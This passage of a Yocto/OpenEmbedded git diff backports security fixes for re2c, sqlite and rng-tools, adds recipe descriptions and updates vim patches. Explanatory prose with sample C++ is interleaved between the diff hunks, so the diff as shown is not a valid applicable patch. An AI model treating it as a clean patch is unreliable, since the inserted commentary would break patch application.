++ const size_t nre = res.size();
++ //DASSERT(nre > 0);
++ size_t size = nre - 1;
++
++ for (size_t i = 0; i < nre; ++i) {
++ size += estimate_re_size(res[i], stack) + 1;
++ }
++
++ return size;
+ }
+
+ } // namespace re2c
+
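All four CVE-2018-21232 backports above apply the same transformation: a recursive walk over the regular-expression AST is replaced by a depth-first traversal driven by an explicit std::vector used as a stack, so input size no longer translates into native call-stack depth. The sketch below only illustrates that pattern on an invented Node type (it is not re2c code); re2c's real versions additionally keep a succ index per stack item so post-order work can run after the children have been visited.

    #include <cstddef>
    #include <iostream>
    #include <vector>

    struct Node {
        Node *left;
        Node *right;
    };

    // Count nodes iteratively: the explicit stack replaces recursion, so even a
    // degenerate, list-like tree millions of nodes deep cannot overflow the
    // native call stack.
    static std::size_t count_nodes(const Node *root)
    {
        std::size_t count = 0;
        std::vector<const Node *> stack;
        if (root) stack.push_back(root);

        while (!stack.empty()) {
            const Node *n = stack.back();
            stack.pop_back();
            ++count;
            if (n->left)  stack.push_back(n->left);
            if (n->right) stack.push_back(n->right);
        }
        return count;
    }

    int main()
    {
        Node leaf1 = {nullptr, nullptr};
        Node leaf2 = {nullptr, nullptr};
        Node root  = {&leaf1, &leaf2};
        std::cout << count_nodes(&root) << "\n";  // prints 3
        return 0;
    }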
diff --git a/meta/recipes-support/re2c/re2c_1.0.1.bb b/meta/recipes-support/re2c/re2c_1.0.1.bb
index 35200ecde8..ca5c33f151 100644
--- a/meta/recipes-support/re2c/re2c_1.0.1.bb
+++ b/meta/recipes-support/re2c/re2c_1.0.1.bb
@@ -1,11 +1,17 @@
SUMMARY = "Tool for writing very fast and very flexible scanners"
-HOMEPAGE = "http://re2c.sourceforge.net/"
+DESCRIPTION = "A free and open-source lexer generator for C, C++ and Go. It compiles regular expressions to determinisitic finite automata and encodes the automata in the form of a program in the target language. Unlike any other such tool, re2c focuses on generating high efficient code for regular expression matching. As a result this allows a much broader range of use than any traditional lexer."
+HOMEPAGE = "http://re2c.org/"
+BUGTRACKER = "https://github.com/skvadrik/re2c/issues"
AUTHOR = "Marcus Börger <helly@users.sourceforge.net>"
SECTION = "devel"
LICENSE = "PD"
LIC_FILES_CHKSUM = "file://README;beginline=146;md5=881056c9add17f8019ccd8c382ba963a"
-SRC_URI = "https://github.com/skvadrik/re2c/releases/download/${PV}/${BPN}-${PV}.tar.gz"
+SRC_URI = "https://github.com/skvadrik/re2c/releases/download/${PV}/${BPN}-${PV}.tar.gz \
+file://CVE-2018-21232-1.patch \
+file://CVE-2018-21232-2.patch \
+file://CVE-2018-21232-3.patch \
+file://CVE-2018-21232-4.patch"
SRC_URI[md5sum] = "e2c6cf52fc6a21595f21bc82db5324f8"
SRC_URI[sha256sum] = "605058d18a00e01bfc32aebf83af35ed5b13180b4e9f279c90843afab2c66c7c"
UPSTREAM_CHECK_URI = "https://github.com/skvadrik/re2c/releases"
diff --git a/meta/recipes-support/rng-tools/rng-tools/0001-rngd_jitter-fix-O_NONBLOCK-setting-for-entropy-pipe.patch b/meta/recipes-support/rng-tools/rng-tools/0001-rngd_jitter-fix-O_NONBLOCK-setting-for-entropy-pipe.patch
new file mode 100644
index 0000000000..3b44095cf5
--- /dev/null
+++ b/meta/recipes-support/rng-tools/rng-tools/0001-rngd_jitter-fix-O_NONBLOCK-setting-for-entropy-pipe.patch
@@ -0,0 +1,26 @@
+From 6ce86cb5cf06541cd5aad70fe8494b07b22c247e Mon Sep 17 00:00:00 2001
+From: Matthias Schiffer <matthias.schiffer@tq-group.com>
+Date: Wed, 27 Jan 2021 16:10:32 +0100
+Subject: [PATCH] rngd_jitter: fix O_NONBLOCK setting for entropy pipe
+
+A pointer was passed to fcntl instead of the flags variable, setting
+random flags.
+
+Signed-off-by: Matthias Schiffer <matthias.schiffer@tq-group.com>
+---
+ rngd_jitter.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/rngd_jitter.c b/rngd_jitter.c
+index 32bac53..25b3543 100644
+--- a/rngd_jitter.c
++++ b/rngd_jitter.c
+@@ -465,7 +465,7 @@ int init_jitter_entropy_source(struct rng *ent_src)
+
+ flags = fcntl(pipefds[0], F_GETFL, 0);
+ flags |= O_NONBLOCK;
+- fcntl(pipefds[0], F_SETFL, &flags);
++ fcntl(pipefds[0], F_SETFL, flags);
+
+ if (ent_src->rng_options[JITTER_OPT_USE_AES].int_val) {
+ #ifdef HAVE_LIBGCRYPT
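The patch above fixes a classic fcntl misuse: F_SETFL expects the flag word by value, but the original code passed &flags, so the pointer value was installed as the file status flags. Below is a minimal, hypothetical sketch of the corrected pattern; the pipe setup and error handling are invented for the example and not taken from rng-tools.

    #include <cstdio>
    #include <fcntl.h>
    #include <unistd.h>

    // Set O_NONBLOCK on a descriptor; fcntl(F_SETFL) takes the flag word
    // itself, not a pointer to it.
    static int make_nonblocking(int fd)
    {
        int flags = fcntl(fd, F_GETFL, 0);
        if (flags == -1)
            return -1;
        flags |= O_NONBLOCK;
        return fcntl(fd, F_SETFL, flags);  // value, not &flags
    }

    int main()
    {
        int pipefds[2];
        if (pipe(pipefds) == 0 && make_nonblocking(pipefds[0]) == 0)
            std::puts("read end of the pipe is now non-blocking");
        return 0;
    }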
diff --git a/meta/recipes-support/rng-tools/rng-tools/0002-rngd_jitter-initialize-AES-key-before-setting-the-en.patch b/meta/recipes-support/rng-tools/rng-tools/0002-rngd_jitter-initialize-AES-key-before-setting-the-en.patch
new file mode 100644
index 0000000000..34f8227543
--- /dev/null
+++ b/meta/recipes-support/rng-tools/rng-tools/0002-rngd_jitter-initialize-AES-key-before-setting-the-en.patch
@@ -0,0 +1,38 @@
+From 330c2ba14510c8103b30d5021adb18f1534031a1 Mon Sep 17 00:00:00 2001
+From: Matthias Schiffer <matthias.schiffer@tq-group.com>
+Date: Wed, 27 Jan 2021 16:18:09 +0100
+Subject: [PATCH] rngd_jitter: initialize AES key before setting the entropy
+ pipe to O_NONBLOCK
+
+Signed-off-by: Matthias Schiffer <matthias.schiffer@tq-group.com>
+---
+ rngd_jitter.c | 9 +++++----
+ 1 file changed, 5 insertions(+), 4 deletions(-)
+
+diff --git a/rngd_jitter.c b/rngd_jitter.c
+index 25b3543..48f344c 100644
+--- a/rngd_jitter.c
++++ b/rngd_jitter.c
+@@ -463,10 +463,6 @@ int init_jitter_entropy_source(struct rng *ent_src)
+ pthread_mutex_unlock(&tdata[i].statemtx);
+ }
+
+- flags = fcntl(pipefds[0], F_GETFL, 0);
+- flags |= O_NONBLOCK;
+- fcntl(pipefds[0], F_SETFL, flags);
+-
+ if (ent_src->rng_options[JITTER_OPT_USE_AES].int_val) {
+ #ifdef HAVE_LIBGCRYPT
+ /*
+@@ -487,6 +483,11 @@ int init_jitter_entropy_source(struct rng *ent_src)
+ ent_src->rng_options[JITTER_OPT_USE_AES].int_val = 1;
+ }
+ xread_jitter(aes_buf, tdata[0].buf_sz, ent_src);
++
++ flags = fcntl(pipefds[0], F_GETFL, 0);
++ flags |= O_NONBLOCK;
++ fcntl(pipefds[0], F_SETFL, flags);
++
+ #else
+ message_entsrc(ent_src,LOG_CONS|LOG_INFO, "libgcrypt not available. Disabling AES in JITTER source\n");
+ ent_src->rng_options[JITTER_OPT_USE_AES].int_val = 0;
diff --git a/meta/recipes-support/rng-tools/rng-tools/0003-rngd_jitter-always-read-from-entropy-pipe-before-set.patch b/meta/recipes-support/rng-tools/rng-tools/0003-rngd_jitter-always-read-from-entropy-pipe-before-set.patch
new file mode 100644
index 0000000000..b3bc8028ea
--- /dev/null
+++ b/meta/recipes-support/rng-tools/rng-tools/0003-rngd_jitter-always-read-from-entropy-pipe-before-set.patch
@@ -0,0 +1,38 @@
+From 36bc92ef2789b13183c8895d83665f48b13c2b9e Mon Sep 17 00:00:00 2001
+From: Matthias Schiffer <matthias.schiffer@tq-group.com>
+Date: Wed, 27 Jan 2021 16:22:39 +0100
+Subject: [PATCH] rngd_jitter: always read from entropy pipe before setting
+ O_NONBLOCK
+
+Even with AES disabled, we want to make sure that jent_read_entropy() has
+already generated some entropy before we consider the source
+initialized. Otherwise "Entropy Generation is slow" log spam will be
+emitted until this has happened, which can take several seconds.
+
+Signed-off-by: Matthias Schiffer <matthias.schiffer@tq-group.com>
+---
+ rngd_jitter.c | 11 +++++++++++
+ 1 file changed, 11 insertions(+)
+
+diff --git a/rngd_jitter.c b/rngd_jitter.c
+index 48f344c..b736cdd 100644
+--- a/rngd_jitter.c
++++ b/rngd_jitter.c
+@@ -492,6 +492,17 @@ int init_jitter_entropy_source(struct rng *ent_src)
+ message_entsrc(ent_src,LOG_CONS|LOG_INFO, "libgcrypt not available. Disabling AES in JITTER source\n");
+ ent_src->rng_options[JITTER_OPT_USE_AES].int_val = 0;
+ #endif
++ } else {
++ /*
++ * Make sure that an entropy gathering thread has generated
++ * at least some entropy before setting O_NONBLOCK and finishing
++ * the entropy source initialization.
++ *
++ * This avoids "Entropy Generation is slow" log spamming that
++ * would otherwise happen until jent_read_entropy() has run
++ * for the first time.
++ */
++ xread_jitter(&i, 1, ent_src);
+ }
+ message_entsrc(ent_src,LOG_DAEMON|LOG_INFO, "Enabling JITTER rng support\n");
+ return 0;
diff --git a/meta/recipes-support/rng-tools/rng-tools/rngd.service b/meta/recipes-support/rng-tools/rng-tools/rngd.service
index aaaaa29074..f296a99e1f 100644
--- a/meta/recipes-support/rng-tools/rng-tools/rngd.service
+++ b/meta/recipes-support/rng-tools/rng-tools/rngd.service
@@ -3,6 +3,7 @@ Description=Hardware RNG Entropy Gatherer Daemon
DefaultDependencies=no
After=systemd-udev-settle.service
Before=sysinit.target shutdown.target
+Wants=systemd-udev-settle.service
Conflicts=shutdown.target
[Service]
diff --git a/meta/recipes-support/rng-tools/rng-tools_6.9.bb b/meta/recipes-support/rng-tools/rng-tools_6.9.bb
index 913342c315..58b58fbb3c 100644
--- a/meta/recipes-support/rng-tools/rng-tools_6.9.bb
+++ b/meta/recipes-support/rng-tools/rng-tools_6.9.bb
@@ -9,7 +9,10 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
DEPENDS = "sysfsutils"
SRC_URI = "\
- git://github.com/nhorman/rng-tools.git \
+ git://github.com/nhorman/rng-tools.git;branch=master;protocol=https \
+ file://0001-rngd_jitter-fix-O_NONBLOCK-setting-for-entropy-pipe.patch \
+ file://0002-rngd_jitter-initialize-AES-key-before-setting-the-en.patch \
+ file://0003-rngd_jitter-always-read-from-entropy-pipe-before-set.patch \
file://init \
file://default \
file://rngd.service \
diff --git a/meta/recipes-support/serf/serf_1.3.9.bb b/meta/recipes-support/serf/serf_1.3.9.bb
index 6a27f12102..3276d40df6 100644
--- a/meta/recipes-support/serf/serf_1.3.9.bb
+++ b/meta/recipes-support/serf/serf_1.3.9.bb
@@ -1,4 +1,9 @@
SUMMARY = "High-Performance Asynchronous HTTP Client Library"
+DESCRIPTION = "The Apache Serf library is a C-based HTTP client library built upon the Apache \
+Portable Runtime (APR) library. It multiplexes connections, running the \
+read/write communication asynchronously. Memory copies and transformations are \
+kept to a minimum to provide high performance operation."
+HOMEPAGE = "http://serf.apache.org/"
SRC_URI = "${APACHE_MIRROR}/${BPN}/${BPN}-${PV}.tar.bz2 \
file://norpath.patch \
file://env.patch \
@@ -30,4 +35,9 @@ EXTRA_OESCONS = " \
OPENSSL="${STAGING_EXECPREFIXDIR}" \
"
+# scons creates non-reproducible archives
+do_install_append() {
+ rm ${D}/${libdir}/*.a
+}
+
BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb b/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb
index 7a060b09ad..05c7d32965 100644
--- a/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb
+++ b/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb
@@ -1,4 +1,5 @@
SUMMARY = "Shared MIME type database and specification"
+DESCRIPTION = "The shared-mime-info package contains the core database of common types and the update-mime-database command used to extend it. It requires glib2 to be installed for building the update command. Additionally, it uses intltool for translations, though this is only a dependency for the maintainers."
HOMEPAGE = "http://freedesktop.org/wiki/Software/shared-mime-info"
SECTION = "base"
@@ -7,7 +8,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
DEPENDS = "libxml2 itstool-native glib-2.0 shared-mime-info-native"
-SRC_URI = "git://gitlab.freedesktop.org/xdg/shared-mime-info.git;protocol=https"
+SRC_URI = "git://gitlab.freedesktop.org/xdg/shared-mime-info.git;protocol=https;branch=master"
SRCREV = "829b26d85e7d89a0caee03046c3bce373f04c80a"
PV = "1.15"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-support/sqlite/files/CVE-2020-35525.patch b/meta/recipes-support/sqlite/files/CVE-2020-35525.patch
new file mode 100644
index 0000000000..27d81d42d9
--- /dev/null
+++ b/meta/recipes-support/sqlite/files/CVE-2020-35525.patch
@@ -0,0 +1,21 @@
+From: drh <drh@noemail.net>
+Date: Thu, 20 Feb 2020 14:08:51 +0000
+Subject: [PATCH] Early-out on the INTERSECT query processing following an
+ error.
+
+Upstream-Status: Backport [http://security.debian.org/debian-security/pool/updates/main/s/sqlite3/sqlite3_3.27.2-3+deb10u2.debian.tar.xz]
+CVE: CVE-2020-35525
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+---
+Index: sqlite-autoconf-3310100/sqlite3.c
+===================================================================
+--- sqlite-autoconf-3310100.orig/sqlite3.c
++++ sqlite-autoconf-3310100/sqlite3.c
+@@ -130767,6 +130767,7 @@ static int multiSelect(
+ /* Generate code to take the intersection of the two temporary
+ ** tables.
+ */
++ if( rc ) break;
+ assert( p->pEList );
+ iBreak = sqlite3VdbeMakeLabel(pParse);
+ iCont = sqlite3VdbeMakeLabel(pParse);
diff --git a/meta/recipes-support/sqlite/files/CVE-2020-35527.patch b/meta/recipes-support/sqlite/files/CVE-2020-35527.patch
new file mode 100644
index 0000000000..d1dae389b0
--- /dev/null
+++ b/meta/recipes-support/sqlite/files/CVE-2020-35527.patch
@@ -0,0 +1,22 @@
+From: dan <dan@noemail.net>
+Date: Mon, 26 Oct 2020 13:24:36 +0000
+Subject: [PATCH] Fix a problem with ALTER TABLE for views that have a nested
+ FROM clause. Ticket [f50af3e8a565776b].
+
+Upstream-Status: Backport [http://security.debian.org/debian-security/pool/updates/main/s/sqlite3/sqlite3_3.27.2-3+deb10u2.debian.tar.xz]
+CVE: CVE-2020-35527
+Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
+---
+Index: sqlite-autoconf-3310100/sqlite3.c
+===================================================================
+--- sqlite-autoconf-3310100.orig/sqlite3.c
++++ sqlite-autoconf-3310100/sqlite3.c
+@@ -133110,7 +133110,7 @@ static int selectExpander(Walker *pWalke
+ pNew = sqlite3ExprListAppend(pParse, pNew, pExpr);
+ sqlite3TokenInit(&sColname, zColname);
+ sqlite3ExprListSetName(pParse, pNew, &sColname, 0);
+- if( pNew && (p->selFlags & SF_NestedFrom)!=0 ){
++ if( pNew && (p->selFlags & SF_NestedFrom)!=0 && !IN_RENAME_OBJECT ){
+ struct ExprList_item *pX = &pNew->a[pNew->nExpr-1];
+ sqlite3DbFree(db, pX->zEName);
+ if( pSub ){
diff --git a/meta/recipes-support/sqlite/files/CVE-2021-20223.patch b/meta/recipes-support/sqlite/files/CVE-2021-20223.patch
new file mode 100644
index 0000000000..e9d2e04d30
--- /dev/null
+++ b/meta/recipes-support/sqlite/files/CVE-2021-20223.patch
@@ -0,0 +1,23 @@
+From d1d43efa4fb0f2098c0e2c5bf2e807c58d5ec05b Mon Sep 17 00:00:00 2001
+From: dan <dan@noemail.net>
+Date: Mon, 26 Oct 2020 13:24:36 +0000
+Subject: [PATCH] Prevent fts5 tokenizer unicode61 from considering '\0' to be
+ a token character, even if other characters of class "Cc" are.
+
+FossilOrigin-Name: b7b7bde9b7a03665e3691c6d51118965f216d2dfb1617f138b9f9e60e418ed2f
+
+CVE: CVE-2021-20223
+Upstream-Status: Backport [https://github.com/sqlite/sqlite/commit/d1d43efa4fb0f2098c0e2c5bf2e807c58d5ec05b.patch]
+Comment: Removed manifest, manifest.uuid and fts5tok1.test as these files are not present in the amalgamated source code
+Signed-Off-by: Sana.Kazi@kpit.com
+---
+--- a/sqlite3.c 2022-09-09 13:54:30.010768197 +0530
++++ b/sqlite3.c 2022-09-09 13:56:25.458769142 +0530
+@@ -227114,6 +227114,7 @@
+ }
+ iTbl++;
+ }
++ aAscii[0] = 0; /* 0x00 is never a token character */
+ }
+
+ /*
diff --git a/meta/recipes-support/sqlite/files/CVE-2022-35737.patch b/meta/recipes-support/sqlite/files/CVE-2022-35737.patch
new file mode 100644
index 0000000000..341e002913
--- /dev/null
+++ b/meta/recipes-support/sqlite/files/CVE-2022-35737.patch
@@ -0,0 +1,29 @@
+From 2bbf4c999dbb4b520561a57e0bafc19a15562093 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Fri, 2 Sep 2022 11:22:29 +0530
+Subject: [PATCH] CVE-2022-35737
+
+Upstream-Status: Backport [https://www.sqlite.org/src/info/aab790a16e1bdff7]
+CVE: CVE-2022-35737
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ sqlite3.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/sqlite3.c b/sqlite3.c
+index f664217..33dfb78 100644
+--- a/sqlite3.c
++++ b/sqlite3.c
+@@ -28758,7 +28758,8 @@ SQLITE_API void sqlite3_str_vappendf(
+ case etSQLESCAPE: /* %q: Escape ' characters */
+ case etSQLESCAPE2: /* %Q: Escape ' and enclose in '...' */
+ case etSQLESCAPE3: { /* %w: Escape " characters */
+- int i, j, k, n, isnull;
++ i64 i, j, k, n;
++ int isnull;
+ int needQuote;
+ char ch;
+ char q = ((xtype==etSQLESCAPE3)?'"':'\''); /* Quote character */
+--
+2.25.1
+
diff --git a/meta/recipes-support/sqlite/files/CVE-2023-7104.patch b/meta/recipes-support/sqlite/files/CVE-2023-7104.patch
new file mode 100644
index 0000000000..01ff29ff5e
--- /dev/null
+++ b/meta/recipes-support/sqlite/files/CVE-2023-7104.patch
@@ -0,0 +1,46 @@
+From eab426c5fba69d2c77023939f72b4ad446834e3c Mon Sep 17 00:00:00 2001
+From: dan <Dan Kennedy>
+Date: Thu, 7 Sep 2023 13:53:09 +0000
+Subject: [PATCH] Fix a buffer overread in the sessions extension that could occur when processing a corrupt changeset.
+
+Upstream-Status: Backport [https://sqlite.org/src/info/0e4e7a05c4204b47]
+CVE: CVE-2023-7104
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ sqlite3.c | 18 +++++++++++-------
+ 1 file changed, 11 insertions(+), 7 deletions(-)
+
+diff --git a/sqlite3.c b/sqlite3.c
+index 972ef18..c645ac8 100644
+--- a/sqlite3.c
++++ b/sqlite3.c
+@@ -203301,15 +203301,19 @@ static int sessionReadRecord(
+ }
+ }
+ if( eType==SQLITE_INTEGER || eType==SQLITE_FLOAT ){
+- sqlite3_int64 v = sessionGetI64(aVal);
+- if( eType==SQLITE_INTEGER ){
+- sqlite3VdbeMemSetInt64(apOut[i], v);
++ if( (pIn->nData-pIn->iNext)<8 ){
++ rc = SQLITE_CORRUPT_BKPT;
+ }else{
+- double d;
+- memcpy(&d, &v, 8);
+- sqlite3VdbeMemSetDouble(apOut[i], d);
++ sqlite3_int64 v = sessionGetI64(aVal);
++ if( eType==SQLITE_INTEGER ){
++ sqlite3VdbeMemSetInt64(apOut[i], v);
++ }else{
++ double d;
++ memcpy(&d, &v, 8);
++ sqlite3VdbeMemSetDouble(apOut[i], d);
++ }
++ pIn->iNext += 8;
+ }
+- pIn->iNext += 8;
+ }
+ }
+ }
+--
+2.25.1
+
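The CVE-2023-7104 fix above follows a general rule for parsers of untrusted input: verify that enough bytes remain before decoding a fixed-size field, rather than reading first and advancing the cursor afterwards. A small, hypothetical sketch of that guard is shown below; the Input and read_i64 names are invented for the example and are not sqlite's API.

    #include <cstddef>
    #include <cstdint>
    #include <cstdio>
    #include <optional>

    // Cursor over an untrusted byte buffer.
    struct Input {
        const std::uint8_t *data;
        std::size_t len;
        std::size_t next;
    };

    // Decode an 8-byte big-endian integer only if 8 bytes actually remain,
    // mirroring the (pIn->nData - pIn->iNext) < 8 check added by the fix.
    static std::optional<std::int64_t> read_i64(Input &in)
    {
        if (in.len - in.next < 8)
            return std::nullopt;  // truncated/corrupt record
        std::uint64_t v = 0;
        for (int i = 0; i < 8; ++i)
            v = (v << 8) | in.data[in.next + i];
        in.next += 8;
        return static_cast<std::int64_t>(v);
    }

    int main()
    {
        const std::uint8_t buf[4] = {1, 2, 3, 4};  // deliberately too short
        Input in = {buf, sizeof(buf), 0};
        if (!read_i64(in))
            std::puts("rejected truncated record");
        return 0;
    }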
diff --git a/meta/recipes-support/sqlite/sqlite3.inc b/meta/recipes-support/sqlite/sqlite3.inc
index 07614bdb3e..1adc0eba66 100644
--- a/meta/recipes-support/sqlite/sqlite3.inc
+++ b/meta/recipes-support/sqlite/sqlite3.inc
@@ -1,4 +1,5 @@
SUMMARY = "Embeddable SQL database engine"
+DESCRIPTION = "A library that implements a small, fast, self-contained, high-reliability, full-featured, SQL database engine. SQLite is the most used database engine in the world. SQLite is built into all mobile phones and most computers and comes bundled inside countless other applications that people use every day"
HOMEPAGE = "http://www.sqlite.org"
SECTION = "libs"
diff --git a/meta/recipes-support/sqlite/sqlite3_3.31.1.bb b/meta/recipes-support/sqlite/sqlite3_3.31.1.bb
index c289affd60..0e7bcfa5a7 100644
--- a/meta/recipes-support/sqlite/sqlite3_3.31.1.bb
+++ b/meta/recipes-support/sqlite/sqlite3_3.31.1.bb
@@ -13,9 +13,16 @@ SRC_URI = "http://www.sqlite.org/2020/sqlite-autoconf-${SQLITE_PV}.tar.gz \
file://CVE-2020-13630.patch \
file://CVE-2020-13631.patch \
file://CVE-2020-13632.patch \
+ file://CVE-2022-35737.patch \
+ file://CVE-2020-35525.patch \
+ file://CVE-2020-35527.patch \
+ file://CVE-2021-20223.patch \
+ file://CVE-2023-7104.patch \
"
SRC_URI[md5sum] = "2d0a553534c521504e3ac3ad3b90f125"
SRC_URI[sha256sum] = "62284efebc05a76f909c580ffa5c008a7d22a1287285d68b7825a2b6b51949ae"
# -19242 is only an issue in specific development branch commits
CVE_CHECK_WHITELIST += "CVE-2019-19242"
+# This is believed to be iOS specific (https://groups.google.com/g/sqlite-dev/c/U7OjAbZO6LA)
+CVE_CHECK_WHITELIST += "CVE-2015-3717"
diff --git a/meta/recipes-support/taglib/taglib_1.11.1.bb b/meta/recipes-support/taglib/taglib_1.11.1.bb
index f4e288295d..165bccadc1 100644
--- a/meta/recipes-support/taglib/taglib_1.11.1.bb
+++ b/meta/recipes-support/taglib/taglib_1.11.1.bb
@@ -1,4 +1,5 @@
SUMMARY = "Library for reading and editing the meta-data of popular audio formats"
+DESCRIPTION = "Platform-independent library (tested on Windows/Linux) for reading and writing metadata in media files, including video, audio, and photo formats. This is a convenient one-stop-shop to present or tag all your media collection, regardless of which format/container these might use. You can read/write the standard or more common tags/properties of a media, or you can also create and retrieve your own custom tags."
SECTION = "libs/multimedia"
HOMEPAGE = "http://taglib.github.io/"
LICENSE = "LGPLv2.1 | MPL-1.1"
diff --git a/meta/recipes-support/vim/files/0001-src-Makefile-improve-reproducibility.patch b/meta/recipes-support/vim/files/0001-src-Makefile-improve-reproducibility.patch
index 63a7b78f12..2fc11dbdc2 100644
--- a/meta/recipes-support/vim/files/0001-src-Makefile-improve-reproducibility.patch
+++ b/meta/recipes-support/vim/files/0001-src-Makefile-improve-reproducibility.patch
@@ -16,11 +16,11 @@ Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
src/Makefile | 14 ++++----------
1 file changed, 4 insertions(+), 10 deletions(-)
-diff --git a/src/Makefile b/src/Makefile
-index f2fafa4dc..7148d4bd9 100644
---- a/src/Makefile
-+++ b/src/Makefile
-@@ -2845,16 +2845,10 @@ auto/pathdef.c: Makefile auto/config.mk
+Index: git/src/Makefile
+===================================================================
+--- git.orig/src/Makefile
++++ git/src/Makefile
+@@ -3101,16 +3101,10 @@ auto/pathdef.c: Makefile auto/config.mk
-@echo '#include "vim.h"' >> $@
-@echo 'char_u *default_vim_dir = (char_u *)"$(VIMRCLOC)";' | $(QUOTESED) >> $@
-@echo 'char_u *default_vimruntime_dir = (char_u *)"$(VIMRUNTIMEDIR)";' | $(QUOTESED) >> $@
@@ -41,6 +41,3 @@ index f2fafa4dc..7148d4bd9 100644
-@sh $(srcdir)/pathdef.sh
GUI_GTK_RES_INPUTS = \
---
-2.17.1
-
diff --git a/meta/recipes-support/vim/files/disable_acl_header_check.patch b/meta/recipes-support/vim/files/disable_acl_header_check.patch
index 33089162b4..533138245d 100644
--- a/meta/recipes-support/vim/files/disable_acl_header_check.patch
+++ b/meta/recipes-support/vim/files/disable_acl_header_check.patch
@@ -13,11 +13,11 @@ Signed-off-by: Changqing Li <changqing.li@windriver.com>
src/configure.ac | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
-diff --git a/src/configure.ac b/src/configure.ac
-index 2d409b3ca06a..dbcaf6140263 100644
---- a/src/configure.ac
-+++ b/src/configure.ac
-@@ -3257,7 +3257,7 @@ AC_CHECK_HEADERS(stdint.h stdlib.h string.h \
+Index: git/src/configure.ac
+===================================================================
+--- git.orig/src/configure.ac
++++ git/src/configure.ac
+@@ -3292,7 +3292,7 @@ AC_CHECK_HEADERS(stdint.h stdlib.h strin
sys/systeminfo.h locale.h sys/stream.h termios.h \
libc.h sys/statfs.h poll.h sys/poll.h pwd.h \
utime.h sys/param.h sys/ptms.h libintl.h libgen.h \
@@ -26,7 +26,7 @@ index 2d409b3ca06a..dbcaf6140263 100644
sys/access.h sys/sysinfo.h wchar.h wctype.h)
dnl sys/ptem.h depends on sys/stream.h on Solaris
-@@ -3886,6 +3886,7 @@ AC_ARG_ENABLE(acl,
+@@ -3974,6 +3974,7 @@ AC_ARG_ENABLE(acl,
, [enable_acl="yes"])
if test "$enable_acl" = "yes"; then
AC_MSG_RESULT(no)
@@ -34,6 +34,3 @@ index 2d409b3ca06a..dbcaf6140263 100644
AC_CHECK_LIB(posix1e, acl_get_file, [LIBS="$LIBS -lposix1e"],
AC_CHECK_LIB(acl, acl_get_file, [LIBS="$LIBS -lacl"
AC_CHECK_LIB(attr, fgetxattr, LIBS="$LIBS -lattr",,)],,),)
---
-2.7.4
-
diff --git a/meta/recipes-support/vim/files/no-path-adjust.patch b/meta/recipes-support/vim/files/no-path-adjust.patch
index 05c2d803f6..9d6da80913 100644
--- a/meta/recipes-support/vim/files/no-path-adjust.patch
+++ b/meta/recipes-support/vim/files/no-path-adjust.patch
@@ -7,9 +7,11 @@ Upstream-Status: Pending
Signed-off-by: Joe Slater <joe.slater@windriver.com>
---- a/src/Makefile
-+++ b/src/Makefile
-@@ -2507,11 +2507,14 @@ installtools: $(TOOLS) $(DESTDIR)$(exec_
+Index: git/src/Makefile
+===================================================================
+--- git.orig/src/Makefile
++++ git/src/Makefile
+@@ -2565,11 +2565,14 @@ installtools: $(TOOLS) $(DESTDIR)$(exec_
rm -rf $$cvs; \
fi
-chmod $(FILEMOD) $(DEST_TOOLS)/*
diff --git a/meta/recipes-support/vim/files/vim-add-knob-whether-elf.h-are-checked.patch b/meta/recipes-support/vim/files/vim-add-knob-whether-elf.h-are-checked.patch
index 37914d4cd9..5284ba45b6 100644
--- a/meta/recipes-support/vim/files/vim-add-knob-whether-elf.h-are-checked.patch
+++ b/meta/recipes-support/vim/files/vim-add-knob-whether-elf.h-are-checked.patch
@@ -14,11 +14,11 @@ Signed-off-by: Changqing Li <changqing.li@windriver.com>
src/configure.ac | 7 +++++++
1 file changed, 7 insertions(+)
-diff --git a/src/configure.ac b/src/configure.ac
-index 0ee86ad..64736f0 100644
---- a/src/configure.ac
-+++ b/src/configure.ac
-@@ -3192,11 +3192,18 @@ AC_TRY_COMPILE([#include <stdio.h>], [int x __attribute__((unused));],
+Index: git/src/configure.ac
+===================================================================
+--- git.orig/src/configure.ac
++++ git/src/configure.ac
+@@ -3264,11 +3264,18 @@ AC_TRY_COMPILE([#include <stdio.h>], [in
AC_MSG_RESULT(no))
dnl Checks for header files.
@@ -37,6 +37,3 @@ index 0ee86ad..64736f0 100644
AC_HEADER_DIRENT
---
-2.7.4
-
diff --git a/meta/recipes-support/vim/vim-tiny_8.2.bb b/meta/recipes-support/vim/vim-tiny_9.0.bb
index e4c26d23f6..e4c26d23f6 100644
--- a/meta/recipes-support/vim/vim-tiny_8.2.bb
+++ b/meta/recipes-support/vim/vim-tiny_9.0.bb
diff --git a/meta/recipes-support/vim/vim.inc b/meta/recipes-support/vim/vim.inc
index 4d2886c19e..6d62bd67af 100644
--- a/meta/recipes-support/vim/vim.inc
+++ b/meta/recipes-support/vim/vim.inc
@@ -1,28 +1,37 @@
SUMMARY = "Vi IMproved - enhanced vi editor"
+DESCRIPTION = "Vim is a greatly improved version of the good old UNIX editor Vi. Many new features have been added: multi-level undo, syntax highlighting, command line history, on-line help, spell checking, filename completion, block operations, script language, etc. There is also a Graphical User Interface (GUI) available."
SECTION = "console/utils"
+HOMEPAGE = "https://www.vim.org/"
+BUGTRACKER = "https://github.com/vim/vim/issues"
+
DEPENDS = "ncurses gettext-native"
# vimdiff doesn't like busybox diff
RSUGGESTS_${PN} = "diffutils"
+
LICENSE = "vim"
-LIC_FILES_CHKSUM = "file://runtime/doc/uganda.txt;endline=287;md5=a19edd7ec70d573a005d9e509375a99a"
